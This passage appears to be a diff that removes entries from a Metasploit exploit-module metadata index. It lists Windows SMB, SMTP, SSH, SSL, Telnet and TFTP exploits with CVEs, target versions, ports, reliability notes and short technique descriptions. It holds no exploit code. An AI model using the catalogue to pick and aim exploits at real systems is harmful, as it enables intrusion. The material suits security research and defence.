does not support SMB 1.", - "references": [ - "CVE-2008-4037", - "OSVDB-49736", - "MSB-MS08-068", - "URL-http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx", - "URL-https://en.wikipedia.org/wiki/SMBRelay", - "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "PowerShell", - "Native upload", - "MOF upload", - "Command" - ], - "mod_time": "2024-11-12 09:14:51 +0000", - "path": "/modules/exploits/windows/smb/smb_relay.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_relay", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs", - "account-lockouts" - ] - }, - "session_types": false, - "needs_cleanup": null, - "actions": [ - { - "name": "CREATE_SMB_SESSION", - "description": "Do not close the SMB connection after relaying, and instead create an SMB session" - }, - { - "name": "PSEXEC", - "description": "Use the SMB Connection to run the exploit/windows/psexec module against the relay target" - } - ] - }, - "exploit_windows/smb/smb_rras_erraticgopher": { - "name": "Microsoft Windows RRAS Service MIBEntryGet Overflow", - "fullname": "exploit/windows/smb/smb_rras_erraticgopher", - "aliases": [], - "rank": 200, - "disclosure_date": "2017-06-13", - "type": "exploit", - "author": [ - "Equation Group", - "Shadow Brokers", - "Víctor Portal", - "bcoles " - ], - "description": "This module exploits an overflow in the Windows Routing and Remote\n Access Service (RRAS) to execute code as SYSTEM.\n\n The RRAS DCERPC endpoint is accessible to unauthenticated users via\n SMBv1 browser named pipe on Windows Server 2003 and Windows XP hosts;\n however, this module targets Windows Server 2003 only.\n\n Since the service is hosted inside svchost.exe, a failed exploit\n attempt can cause other system services to fail as well.\n\n The module has been successfully tested on:\n\n Windows Server 2003 SP0 (x86);\n Windows Server 2003 SP1 (x86);\n Windows Server 2003 SP2 (x86); and\n Windows Server 2003 R2 SP2 (x86).", - "references": [ - "CVE-2017-8461", - "CWE-119", - "BID-99012", - "EDB-41929", - "PACKETSTORM-147593", - "URL-https://www.securitytracker.com/id/1038701", - "URL-https://github.com/x0rz/EQGRP_Lost_in_Translation/blob/master/windows/exploits/Erraticgopher-1.0.1.0.xml", - "URL-https://support.microsoft.com/en-us/topic/microsoft-security-advisory-4025685-guidance-for-older-platforms-june-13-2017-05151e8a-bd7f-f769-43df-38d2c24f96cd", - "URL-https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa374540(v=vs.85)", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/ebc5c709-36d8-4520-a0ac-6f36d2d6c0b2", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/5dca234b-bea4-4e67-958e-5459a32a7b71", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/4305d67f-9273-49fe-a067-909b6ae8a341", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/3ca0723e-36ea-448a-a97e-1906dd3d07a6", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/dda988f0-4cce-4ffe-b8c9-d5199deafba5", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/169e435d-a975-4c1c-bf41-55fd2bd76125" - ], - "platform": "Windows", - "arch": "x86", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "Windows Server 2003 SP0 (English)", - "Windows Server 2003 SP1 (English) (NX)", - "Windows Server 2003 SP2 (English) (NX)", - "Windows Server 2003 R2 SP2 (English) (NX)" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/smb/smb_rras_erraticgopher.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_rras_erraticgopher", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ErraticGopher" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "unreliable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/smb_shadow": { - "name": "Microsoft Windows SMB Direct Session Takeover", - "fullname": "exploit/windows/smb/smb_shadow", - "aliases": [], - "rank": 0, - "disclosure_date": "2021-02-16", - "type": "exploit", - "author": [ - "usiegl00" - ], - "description": "This module will intercept direct SMB authentication requests to\n another host, gaining access to an authenticated SMB session if\n successful. If the connecting user is an administrator and network\n logins are allowed to the target machine, this module will execute an\n arbitrary payload. To exploit this, the target system must try to\n autheticate to another host on the local area network.\n\n SMB Direct Session takeover is a combination of previous attacks.\n\n This module is dependent on an external ARP spoofer. The builtin ARP\n spoofer was not providing sufficient host discovery. Bettercap v1.6.2\n was used during the development of this module.\n\n The original SMB relay attack was first reported by Sir Dystic on March\n 31st, 2001 at @lanta.con in Atlanta, Georgia.", - "references": [ - "URL-https://strontium.io/blog/introducing-windows-10-smb-shadow-attack" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2022-04-06 07:12:46 +0000", - "path": "/modules/exploits/windows/smb/smb_shadow.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_shadow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/timbuktu_plughntcommand_bof": { - "name": "Timbuktu PlughNTCommand Named Pipe Buffer Overflow", - "fullname": "exploit/windows/smb/timbuktu_plughntcommand_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-06-25", - "type": "exploit", - "author": [ - "bannedit " - ], - "description": "This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n in a pretty novel way.\n\n This exploit requires two connections. The first connection is used to leak stack data\n using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n a large value for this argument it is possible to cause Timbuktu to reply to the initial\n request with leaked stack data. Using this data allows for reliable exploitation of the\n buffer overflow vulnerability.\n\n Props to Infamous41d for helping in finding this exploitation path.\n\n The second connection utilizes the data from the data leak to accurately exploit\n the stack based buffer overflow vulnerability.\n\n TODO:\n hdm suggested using meterpreter's migration capability and restarting the process\n for multishot exploitation.", - "references": [ - "CVE-2009-1394", - "OSVDB-55436", - "BID-35496", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic Targeting" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb", - "is_install_path": true, - "ref_name": "windows/smb/timbuktu_plughntcommand_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/webexec": { - "name": "WebExec Authenticated User Code Execution", - "fullname": "exploit/windows/smb/webexec", - "aliases": [], - "rank": 0, - "disclosure_date": "2018-10-24", - "type": "exploit", - "author": [ - "Ron " - ], - "description": "This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.", - "references": [ - "URL-https://webexec.org", - "CVE-2018-15442" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "Native upload" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/webexec.rb", - "is_install_path": true, - "ref_name": "windows/smb/webexec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/mailcarrier_smtp_ehlo": { - "name": "TABS MailCarrier v2.51 SMTP EHLO Overflow", - "fullname": "exploit/windows/smtp/mailcarrier_smtp_ehlo", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-10-26", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits the MailCarrier v2.51 suite SMTP service.\n The stack is overwritten when sending an overly long EHLO command.", - "references": [ - "CVE-2004-1638", - "OSVDB-11174", - "BID-11535", - "EDB-598" - ], - "platform": "Windows", - "arch": "x86", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0 - XP SP1 - EN/FR/GR", - "Windows XP SP2 - EN" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb", - "is_install_path": true, - "ref_name": "windows/smtp/mailcarrier_smtp_ehlo", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/mercury_cram_md5": { - "name": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", - "fullname": "exploit/windows/smtp/mercury_cram_md5", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n may be able to execute arbitrary code.", - "references": [ - "CVE-2007-4440", - "OSVDB-39669", - "BID-25357" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Mercury Mail Transport System 4.51" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/mercury_cram_md5.rb", - "is_install_path": true, - "ref_name": "windows/smtp/mercury_cram_md5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/ms03_046_exchange2000_xexch50": { - "name": "MS03-046 Exchange 2000 XEXCH50 Heap Overflow", - "fullname": "exploit/windows/smtp/ms03_046_exchange2000_xexch50", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-10-15", - "type": "exploit", - "author": [ - "hdm ", - "aushack " - ], - "description": "This is an exploit for the Exchange 2000 heap overflow. Due\n to the nature of the vulnerability, this exploit is not very\n reliable. This module has been tested against Exchange 2000\n SP0 and SP3 running a Windows 2000 system patched to SP4. It\n normally takes between one and 100 connection attempts to\n successfully obtain a shell. This exploit is *very* unreliable.", - "references": [ - "CVE-2003-0714", - "BID-8838", - "OSVDB-2674", - "MSB-MS03-046", - "EDB-113" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Exchange 2000" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb", - "is_install_path": true, - "ref_name": "windows/smtp/ms03_046_exchange2000_xexch50", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/njstar_smtp_bof": { - "name": "NJStar Communicator 3.00 MiniSMTP Buffer Overflow", - "fullname": "exploit/windows/smtp/njstar_smtp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-10-31", - "type": "exploit", - "author": [ - "Dillon Beresford" - ], - "description": "This module exploits a stack buffer overflow vulnerability in NJStar Communicator\n Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple\n NJStar products, and will continue to run in the background even if the\n software is already shutdown. According to the vendor's testimonials,\n NJStar software is also used by well known companies such as Siemens, NEC,\n Google, Yahoo, eBay; government agencies such as the FBI, Department of\n Justice (HK); as well as a long list of universities such as Yale, Harvard,\n University of Tokyo, etc.", - "references": [ - "OSVDB-76728", - "CVE-2011-4040", - "URL-http://www.njstar.com/cms/njstar-communicator", - "EDB-18057" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/SP3", - "Windows Server 2003 SP0", - "Windows Server 2003 SP1/SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/njstar_smtp_bof.rb", - "is_install_path": true, - "ref_name": "windows/smtp/njstar_smtp_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/sysgauge_client_bof": { - "name": "SysGauge SMTP Validation Buffer Overflow", - "fullname": "exploit/windows/smtp/sysgauge_client_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-02-28", - "type": "exploit", - "author": [ - "Chris Higgins", - "Peter Baris" - ], - "description": "This module will setup an SMTP server expecting a connection from SysGauge 1.5.18\n via its SMTP server validation. The module sends a malicious response along in the\n 220 service ready response and exploits the client, resulting in an unprivileged shell.", - "references": [ - "CVE-2017-6416", - "EDB-41479" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2018-07-12 17:34:52 +0000", - "path": "/modules/exploits/windows/smtp/sysgauge_client_bof.rb", - "is_install_path": true, - "ref_name": "windows/smtp/sysgauge_client_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/wmailserver": { - "name": "SoftiaCom WMailserver 1.0 Buffer Overflow", - "fullname": "exploit/windows/smtp/wmailserver", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-07-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n (SMTP) via a SEH frame overwrite.", - "references": [ - "CVE-2005-2287", - "OSVDB-17883", - "BID-14213" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English All", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/wmailserver.rb", - "is_install_path": true, - "ref_name": "windows/smtp/wmailserver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/ypops_overflow1": { - "name": "YPOPS 0.6 Buffer Overflow", - "fullname": "exploit/windows/smtp/ypops_overflow1", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-09-27", - "type": "exploit", - "author": [ - "acaro " - ], - "description": "This module exploits a stack buffer overflow in the YPOPS POP3\n service.\n\n This is a classic stack buffer overflow for YPOPS version 0.6.\n Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n jmp ebx opcode in ws_32.dll", - "references": [ - "CVE-2004-1558", - "OSVDB-10367", - "BID-11256", - "URL-http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Automatic", - "Windows 2000 SP0 Italian", - "Windows 2000 Advanced Server Italian SP4", - "Windows 2000 Advanced Server SP3 English", - "Windows 2000 SP0 English", - "Windows 2000 SP1 English", - "Windows 2000 SP2 English", - "Windows 2000 SP3 English", - "Windows 2000 SP4 English", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English", - "Windows 2003 SP0 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/ypops_overflow1.rb", - "is_install_path": true, - "ref_name": "windows/smtp/ypops_overflow1", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/freeftpd_key_exchange": { - "name": "FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow", - "fullname": "exploit/windows/ssh/freeftpd_key_exchange", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-05-12", - "type": "exploit", - "author": [ - "riaf " - ], - "description": "This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.\n This module is based on MC's freesshd_key_exchange exploit.", - "references": [ - "CVE-2006-2407", - "OSVDB-25569", - "BID-17958" - ], - "platform": "Windows", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English", - "Windows 2000 SP0-SP4 German", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssh/freeftpd_key_exchange.rb", - "is_install_path": true, - "ref_name": "windows/ssh/freeftpd_key_exchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/freesshd_authbypass": { - "name": "Freesshd Authentication Bypass", - "fullname": "exploit/windows/ssh/freesshd_authbypass", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-08-11", - "type": "exploit", - "author": [ - "Aris", - "kcope", - "Daniele Martini ", - "Imran E. Dawoodjee (minor improvements)>" - ], - "description": "This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass\n authentication. You just need the username (which defaults to root). The exploit\n has been tested with both password and public key authentication.", - "references": [ - "CVE-2012-6066", - "OSVDB-88006", - "BID-56785", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html", - "URL-https://seclists.org/fulldisclosure/2010/Aug/132" - ], - "platform": "Windows", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "PowerShell", - "CmdStager upload" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/ssh/freesshd_authbypass.rb", - "is_install_path": true, - "ref_name": "windows/ssh/freesshd_authbypass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/freesshd_key_exchange": { - "name": "FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow", - "fullname": "exploit/windows/ssh/freesshd_key_exchange", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-05-12", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.", - "references": [ - "CVE-2006-2407", - "OSVDB-25463", - "BID-17958" - ], - "platform": "Windows", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssh/freesshd_key_exchange.rb", - "is_install_path": true, - "ref_name": "windows/ssh/freesshd_key_exchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/putty_msg_debug": { - "name": "PuTTY Buffer Overflow", - "fullname": "exploit/windows/ssh/putty_msg_debug", - "aliases": [], - "rank": 300, - "disclosure_date": "2002-12-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the PuTTY SSH client that is\n triggered through a validation error in SSH.c. This vulnerability\n affects versions 0.53 and earlier.", - "references": [ - "CVE-2002-1359", - "OSVDB-8044", - "URL-http://www.rapid7.com/advisories/R7-0009.html", - "BID-6407" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English", - "Windows XP SP2 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssh/putty_msg_debug.rb", - "is_install_path": true, - "ref_name": "windows/ssh/putty_msg_debug", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/securecrt_ssh1": { - "name": "SecureCRT SSH1 Buffer Overflow", - "fullname": "exploit/windows/ssh/securecrt_ssh1", - "aliases": [], - "rank": 200, - "disclosure_date": "2002-07-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in SecureCRT <= 4.0\n Beta 2. By sending a vulnerable client an overly long\n SSH1 protocol identifier string, it is possible to execute\n arbitrary code.\n\n This module has only been tested on SecureCRT 3.4.4.", - "references": [ - "CVE-2002-1059", - "OSVDB-4991", - "BID-5287" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SecureCRT.exe (3.4.4)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssh/securecrt_ssh1.rb", - "is_install_path": true, - "ref_name": "windows/ssh/securecrt_ssh1", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/sysax_ssh_username": { - "name": "Sysax 5.53 SSH Username Buffer Overflow", - "fullname": "exploit/windows/ssh/sysax_ssh_username", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-27", - "type": "exploit", - "author": [ - "Craig Freyman", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Sysax's SSH service. By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. Please note that previous versions\n (before 5.53) are also affected by this bug.", - "references": [ - "OSVDB-79689", - "URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html", - "EDB-18535" - ], - "platform": "Windows", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Sysax 5.53 on Win XP SP3 / Win2k3 SP0", - "Sysax 5.53 on Win2K3 SP1/SP2" - ], - "mod_time": "2022-04-18 09:36:52 +0000", - "path": "/modules/exploits/windows/ssh/sysax_ssh_username.rb", - "is_install_path": true, - "ref_name": "windows/ssh/sysax_ssh_username", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssl/ms04_011_pct": { - "name": "MS04-011 Microsoft Private Communications Transport Overflow", - "fullname": "exploit/windows/ssl/ms04_011_pct", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-04-13", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a buffer overflow in the Microsoft\n Windows SSL PCT protocol stack. This code is based on Johnny\n Cyberpunk's THC release and has been tested against Windows\n 2000 and Windows XP. To use this module, specify the remote\n port of any SSL service, or the port and protocol of an\n application that uses SSL. The only application protocol\n supported at this time is SMTP. You only have one chance to\n select the correct target, if you are attacking IIS, you may\n want to try one of the other exploits first (WebDAV). If\n WebDAV does not work, this more than likely means that this\n is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n 5.1). Using the wrong target may not result in an immediate\n crash of the remote system.", - "references": [ - "CVE-2003-0719", - "OSVDB-5250", - "BID-10116", - "MSB-MS04-011" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4", - "Windows 2000 SP3", - "Windows 2000 SP2", - "Windows 2000 SP1", - "Windows 2000 SP0", - "Windows XP SP0", - "Windows XP SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssl/ms04_011_pct.rb", - "is_install_path": true, - "ref_name": "windows/ssl/ms04_011_pct", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/telnet/gamsoft_telsrv_username": { - "name": "GAMSoft TelSrv 1.5 Username Buffer Overflow", - "fullname": "exploit/windows/telnet/gamsoft_telsrv_username", - "aliases": [], - "rank": 200, - "disclosure_date": "2000-07-17", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n Other versions may also be affected. The service terminates after exploitation,\n so you only get one chance!", - "references": [ - "CVE-2000-0665", - "OSVDB-373", - "BID-1478", - "URL-http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip" - ], - "platform": "Windows", - "arch": "x86", - "rport": 23, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP0/4 English REMOTE", - "Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)", - "Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb", - "is_install_path": true, - "ref_name": "windows/telnet/gamsoft_telsrv_username", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/telnet/goodtech_telnet": { - "name": "GoodTech Telnet Server Buffer Overflow", - "fullname": "exploit/windows/telnet/goodtech_telnet", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-03-15", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n versions prior to 5.0.7. By sending an overly long string, an attacker can\n overwrite the buffer and control program execution.", - "references": [ - "CVE-2005-0768", - "OSVDB-14806", - "BID-12815" - ], - "platform": "Windows", - "arch": "", - "rport": 2380, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English All", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/telnet/goodtech_telnet.rb", - "is_install_path": true, - "ref_name": "windows/telnet/goodtech_telnet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/attftp_long_filename": { - "name": "Allied Telesyn TFTP Server 1.9 Long Filename Overflow", - "fullname": "exploit/windows/tftp/attftp_long_filename", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-11-27", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n request (get/write) for an overly long file name.", - "references": [ - "CVE-2006-6184", - "OSVDB-11350", - "BID-21320", - "EDB-2887" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows NT SP4 English", - "Windows 2000 SP0 English", - "Windows 2000 SP1 English", - "Windows 2000 SP2 English", - "Windows 2000 SP3 English", - "Windows 2000 SP4 English", - "Windows XP SP0/1 English", - "Windows XP SP2 English", - "Windows XP SP3 English", - "Windows Server 2003", - "Windows Server 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/attftp_long_filename.rb", - "is_install_path": true, - "ref_name": "windows/tftp/attftp_long_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/distinct_tftp_traversal": { - "name": "Distinct TFTP 3.10 Writable Directory Traversal Execution", - "fullname": "exploit/windows/tftp/distinct_tftp_traversal", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-04-08", - "type": "exploit", - "author": [ - "modpr0be", - "sinn3r " - ], - "description": "This module exploits a directory traversal vulnerability in the TFTP\n Server component of Distinct Intranet Servers version 3.10 which\n allows a remote attacker to write arbitrary files to the server file\n system, resulting in code execution under the context of 'SYSTEM'.\n This module has been tested successfully on TFTP Server version 3.10\n on Windows XP SP3 (EN).", - "references": [ - "OSVDB-80984", - "EDB-18718", - "URL-http://www.spentera.com/advisories/2012/SPN-01-2012.pdf", - "CVE-2012-6664" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-01-28 10:35:25 +0000", - "path": "/modules/exploits/windows/tftp/distinct_tftp_traversal.rb", - "is_install_path": true, - "ref_name": "windows/tftp/distinct_tftp_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/tftp/dlink_long_filename": { - "name": "D-Link TFTP 1.0 Long Filename Buffer Overflow", - "fullname": "exploit/windows/tftp/dlink_long_filename", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-03-12", - "type": "exploit", - "author": [ - "LSO ", - "aushack " - ], - "description": "This module exploits a stack buffer overflow in D-Link TFTP 1.0.\n By sending a request for an overly long file name, an attacker\n could overflow a buffer and execute arbitrary code. For best results,\n use bind payloads with nonx (No NX).", - "references": [ - "CVE-2007-1435", - "OSVDB-33977", - "BID-22923" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English", - "Windows 2000 SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/dlink_long_filename.rb", - "is_install_path": true, - "ref_name": "windows/tftp/dlink_long_filename", - 